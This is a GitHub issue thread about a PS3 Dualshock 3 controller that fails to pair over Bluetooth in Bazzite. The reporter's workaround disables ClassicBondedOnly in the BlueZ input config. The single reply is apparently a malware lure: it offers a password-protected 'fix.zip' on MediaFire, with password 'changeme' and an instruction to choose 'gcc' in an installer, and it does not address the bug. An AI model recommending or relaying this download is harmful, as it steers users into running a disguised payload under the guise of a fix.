### ISSUE TITLE
When connecting Dualshock 3 controller it doesnt work

### ISSUE THREAD

**Issue by AbozzAZ** [ublue-os/bazzite#1546]
### Describe the bug

When you connect a PS3 controller it wont work in the gamescope ui. So i went to the desktop, there when connecting it asks you to authorize it first. After authorizing the controller and removing it from the cable they ask you for a pin code. This pin code is impossible to find. I have found and seen that other people using bluez have had the same issue. The fix was simple: 

In /etc/bluetooth go to input.conf and add these lines:

[General]
ClassicBondedOnly=false

Then restart bluetooth:
sudo systemctl restart bluetooth

After doing this you dont get asked for a pin code and wireless works, but you still need to authorize.

### What did you expect to happen?

When in gamescope connecting PS3 controller with cable should work. Then when disconnecting it, it should automatically connect to bluetooth without needing to do this.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
